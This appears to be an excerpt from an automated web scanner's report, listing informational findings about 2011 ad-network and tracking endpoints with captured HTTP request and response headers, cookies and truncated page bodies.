Set-Cookie: B3=8dnC0000000002u28KY10000000000t.8Tjz0000000000tX97pN0000000001t.8P920000000001tV8Qvs0000000003tY8HLo0000000005tY95u+0000000001tU8Swk0000000005tX93Np0000000001tW8Jbw0000000004tV8T+c0000000001u48B100000000001tY8nf80000000000tX8V.x0000000001tZ8ZIR0000000002tV8nf90000000000tX9ajg0000000001u08QDY0000000001u18Jbt0000000003tY92de0000000002tW8SBq0000000001tZ93Nl0000000001tX8B0.0000000001tX8TZe000000000au09br40000000001u18B120000000005tX8Qvv0000000001tX5J3v0000000000tZ9br30000000001u18WhH0000000001tV8Ykb0000000001tZ84hv0000000002t.9br20000000002u186Y60000000001tW9c2I000000000hu08Swi0000000000tX851k000000000mtY8Swj0000000000tX95uB0000000001tX; expires=Fri, 08-Jul-2011 08:59:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 09 Apr 2011 12:59:30 GMT
Connection: close
Content-Length: 1841

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
16.19. http://cplads.appspot.com/creatives/aio_300_250/GoogleForm_dp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cplads.appspot.com
Path:   /creatives/aio_300_250/GoogleForm_dp.html

Request

GET /creatives/aio_300_250/GoogleForm_dp.html?click_url=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBFTSpqVKgTfayIsjhlQe_uo2ECq3V39oBnZj0wiLAjbcBgPX2HxABGAEg2JK1CzgAUNGf66sGYMnug4jwo-wSsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBLWh0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL3N0b3J5LmFzcD9TPTUwMzEzN7gCGMgC3b-bHKgDAdEDW-WrP1ZkL_joA9Qq6APGB-gDxAfoA44D9QMAAABE%26num%3D1%26sig%3DAGiWqtyZaV6gso4B-6Xa4n-NKpfXOwasuQ%26client%3Dca-pub-2103553853082603%26adurl%3D HTTP/1.1
Host: cplads.appspot.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370546&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fstory.asp%3FS%3D503137&dt=1302352546546&bpp=4&shv=r20110330&jsv=r20110321-2&correlator=1302352546602&frm=0&adk=3878574007&ga_vid=316624107.1302352547&ga_sid=1302352547&ga_hid=1770797232&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fstory.asp%3FS%3D503137&fu=0&ifi=1&dtd=296&xpc=mIXxq5O1Gc&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
ETag: "f-dPwg"
Date: Sat, 09 Apr 2011 12:35:55 GMT
Expires: Sat, 09 Apr 2011 12:45:55 GMT
Content-Type: text/html
Server: Google Frontend
Cache-Control: public, max-age=600
Age: 23
Content-Length: 13989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"><head>

<script src="http:
...[SNIP]...
16.20. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2507573;type=ads-a681;cat=ads-a941;ord=1;num=8143914125394.076? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 09 Apr 2011 00:16:53 GMT
Expires: Sat, 09 Apr 2011 00:16:53 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2098

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Google Code for
...[SNIP]...
16.21. http://ftpcontent.worldnow.com/wcax/custom/branding_feature_i.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ftpcontent.worldnow.com
Path:   /wcax/custom/branding_feature_i.html

Request

GET /wcax/custom/branding_feature_i.html?referrerDomain=www.wcax.com HTTP/1.1
Host: ftpcontent.worldnow.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "9b0b0e6988e51ddbde9d601fdc9a97ea:1246945003"
Last-Modified: Thu, 11 Jun 2009 17:10:26 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:29:28 GMT
Connection: close
Content-Length: 337

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <title>Untitled</title>
</head>

<body style="margin:0px">

<a href="http://www.wcax.com/Global/story.asp?S=475
...[SNIP]...
16.22. http://hostedusa3.whoson.com/include.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hostedusa3.whoson.com
Path:   /include.js

Request

GET /include.js?domain=stalker.opticalcorp-vsdoc.js HTTP/1.1
Host: hostedusa3.whoson.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 315

document.write("<div style='text-align:center;padding:5px'>WhosOn Live Stats &amp; Live Chat services are not active for this site. Please remove the tracking code or re-activate your service. Please
...[SNIP]...
16.23. http://js.adsonar.com/js/pass.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /js/pass.html

Request

GET /js/pass.html?cb=32519 HTTP/1.1
Host: js.adsonar.com
Proxy-Connection: keep-alive
Referer: http://cdn.tacoda.at.atwola.com/an/qseg.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 23 Nov 2010 14:44:54 GMT
ETag: "5ab-495b96a6f2580"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html
Cache-Control: max-age=1766
Expires: Mon, 11 Apr 2011 16:50:45 GMT
Date: Mon, 11 Apr 2011 16:21:19 GMT
Connection: close
Content-Length: 1451

<html><body><script type="text/javascript">
window.onerror=errorHandle;function errorHandle(e){return true;}var d=location.hash;if(d){var c=document.cookie;if(c.length==0||(c.length>0&&c.indexOf("oo_
...[SNIP]...
16.24. http://kellwood.com/homeImageFiles.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /homeImageFiles.asp

Request

GET /homeImageFiles.asp HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/homeImageRoll.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 11 Apr 2011 17:19:51 GMT
Content-Length: 144

picFile1=home7.jpg&picFile2=home1.jpg&picFile3=home2.jpg&picFile4=home3.jpg&picFile4=home5.jpg&picFile5=home6.jpg&picFile6=home7.jpg&totalPics=7
16.25. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=819&ref2=elqNone&tzo=360&ms=647 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=9F2C033650FB4C7793C57A298A857620; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sat, 09 Apr 2011 00:17:52 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;
16.26. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Request

GET /utils/ping.html?random=0.7953731208108366 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=dd7423b0-80a9-45ce-83f1-e3452ea306b5; Domain=.outbrain.com; Expires=Tue, 03-Apr-2012 12:30:48 GMT; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1301899424000"
Last-Modified: Mon, 04 Apr 2011 06:43:44 GMT
Content-Type: text/html
Content-Length: 158
Date: Sat, 09 Apr 2011 12:30:48 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>
16.27. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICA0NDAxNjgzLCAgbmV0d29yazogICAgICAidHVybiIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjEtMiIsICBkZWZhdWx0czogICAgICIwLTAiLCAgcmVxdWVzdDogICAgICAiNjY4Mzc1MTctNDU3ZS00NjgyLWE0OTQtYTAyMDUwNDhkOWY3IiwgIHVzZXI6ICAgICAgICAgImUzNmEyZjIwLTk5ODUtNGRjZC04MmU5LTZmZjAzMTJlMDI0ZSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJEYWxsYXMiLCAgZG1hOiAgICAgICAgICA2MjMsICByZWdpb246ICAgICAgICJUWCIsICBpcDogICAgICAgICAgICIxNzMuMTkzLjIxNC4yNDMiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAicG9saXRpY3MtYm90dG9tIiwgIGRpdjogICAgICAgICAgIjY2ODM3NTE3LTQ1N2UtNDY4Mi1hNDk0LWEwMjA1MDQ4ZDlmNyIsICB1cmw6ICAgICAgICAgICJodHRwOi8vd3d3LmZveG5ld3MuY29tL3BvbGl0aWNzL2luZGV4Lmh0bWwiLCAgZWxhcHNlZDogICAgICAwLCAgZGVjaXNpb246ICAgICAiYWQiLCAgaW1wOiAgICAgICAgICAxLCAgbmV0d29ya19pZDogICAyNCwgIGFjY291bnRfaWQ6ICAgNTQsICBuZXR3b3JrX25hbWU6ICJUdXJuIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjM3IiwgIGZlY3BtOiAgICAgICAgIjEuMzciLCAgZmlsbDogICAgICAgICAiMTMuNjMiLCAgcGxhY2VtZW50OiAgICAicG9saXRpY3MtYm90dG9tIiwgIHJ1bGU6ICAgICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYzMDQ5LCAiYnV5IjoxNzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTk3MTgxLCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWE2IERlZ3JlZXMgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoyMTQxMDc5LCAiYnV5IjozMzExLCJscCI6Imh0dHA6Ly93d3cudmlyZ2luYW1lcmljYS5jb20vdngvYm9va2luZy9leGl0LWhhcHBpZXI/Y2lkPWRpc18wMDA3NiIsImFuIjoiIiwic3RhdHVzIjoiMS4yMyBOIiwiZmlkIjo0ODkyLCAiZmNwbSI6IjEuNzUifSx7Im5ldHdvcmtfbmFtZSI6IlR1YmVtb2d1bCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjU4OTU4MDgsICJidXkiOjg0NzEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyODk3LCAiYnV5IjoxODksImxwIjoiaHR0cDovL3d3dy5ob21lZGVwb3QuY29tLyIsImFuIjoiSG9tZSBEZXBvdCIsInN0YXR1cyI6IjEuNDEiLCJmaWQiOjQ4OTIsICJmY3BtIjoiMS43NSJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI5NzksICJidXkiOjE5OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzQ1In0=
Content-Length: 1838
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
16.28. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/ros

Request

GET /ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICAzMjUzMjI1LCAgbmV0d29yazogICAgICAiaW50ZXJjbGljayIsICBzaXplOiAgICAgICAgICIzMDB4MjUwIiwgIGZyZXE6ICAgICAgICAgIjQtOTk5IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICI5MjJkZmIzYS04ZmRlLTRmMmUtOTM4NS1hNzMxNGQ0NGYzNjMiLCAgdXNlcjogICAgICAgICAiZTM2YTJmMjAtOTk4NS00ZGNkLTgyZTktNmZmMDMxMmUwMjRlIiwgIGNvdW50cnk6ICAgICAgIlVTIiwgIGNpdHk6ICAgICAgICAgIkRhbGxhcyIsICBkbWE6ICAgICAgICAgIDYyMywgIHJlZ2lvbjogICAgICAgIlRYIiwgIGlwOiAgICAgICAgICAgIjE3My4xOTMuMjE0LjI0MyIsICBkZXB0aDogICAgICAgIDEsICB0YXJnZXQ6ICAgICAgICJyb3MiLCAgZGl2OiAgICAgICAgICAiOTIyZGZiM2EtOGZkZS00ZjJlLTkzODUtYTczMTRkNDRmMzYzIiwgIHVybDogICAgICAgICAgImh0dHA6Ly93d3cuZm94bmV3cy5jb20vcG9saXRpY3MvaW5kZXguaHRtbCIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJhZCIsICBpbXA6ICAgICAgICAgIDYsICBuZXR3b3JrX2lkOiAgIDE4LCAgYWNjb3VudF9pZDogICA1MSwgIG5ldHdvcmtfbmFtZTogImludGVyQ2xpY2siLCAgcHVibGlzaGVyX25hbWU6ICJmb3huZXdzIiwgIGVjcG06ICAgICAgICAgIjAuNTEiLCAgZmVjcG06ICAgICAgICAiMC41MSIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAicm9zIiwgIHJ1bGU6ICAgICAgICAgInJvcyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJBcHBOZXh1cyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyOTY3LCAiYnV5IjoxMTEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYzMDQ5LCAiYnV5IjoxNzYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjk3OSwgImJ1eSI6MTk5LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MTk3MTgxLCAiYnV5Ijo1MDMsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJ4KzEgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxMTc4MTUsICJidXkiOjkwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhNiBEZWdyZWVzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjE0MTA3OSwgImJ1eSI6MzMxMSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1YmVtb2d1bCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjU4OTU4MDgsICJidXkiOjg0NzEsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjI4OTcsICJidXkiOjE4OSwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnOSJ9
Content-Length: 835
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:31:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
16.29. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/728x90/politics

Request

GET /ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICAzMDk4MDMwLCAgbmV0d29yazogICAgICAidHVybiIsICBzaXplOiAgICAgICAgICI3Mjh4OTAiLCAgZnJlcTogICAgICAgICAiMS0yIiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICJmZTcyNjY1NS0yMzAzLTRiZGQtYTRkMS0zZTU3Yjg1Y2M4ODYiLCAgdXNlcjogICAgICAgICAiZTM2YTJmMjAtOTk4NS00ZGNkLTgyZTktNmZmMDMxMmUwMjRlIiwgIGNvdW50cnk6ICAgICAgIlVTIiwgIGNpdHk6ICAgICAgICAgIkRhbGxhcyIsICBkbWE6ICAgICAgICAgIDYyMywgIHJlZ2lvbjogICAgICAgIlRYIiwgIGlwOiAgICAgICAgICAgIjE3My4xOTMuMjE0LjI0MyIsICBkZXB0aDogICAgICAgIDEsICB0YXJnZXQ6ICAgICAgICJwb2xpdGljcyIsICBkaXY6ICAgICAgICAgICJmZTcyNjY1NS0yMzAzLTRiZGQtYTRkMS0zZTU3Yjg1Y2M4ODYiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMiwgIG5ldHdvcmtfaWQ6ICAgMjQsICBhY2NvdW50X2lkOiAgIDU0LCAgbmV0d29ya19uYW1lOiAiVHVybiIsICBwdWJsaXNoZXJfbmFtZTogImZveG5ld3MiLCAgZWNwbTogICAgICAgICAiMS4yNiIsICBmZWNwbTogICAgICAgICIxLjI2IiwgIGZpbGw6ICAgICAgICAgIjYuODQiLCAgcGxhY2VtZW50OiAgICAicG9saXRpY3MiLCAgcnVsZTogICAgICAgICAicG9saXRpY3MiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW10sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnNDUifQ==
Content-Length: 768
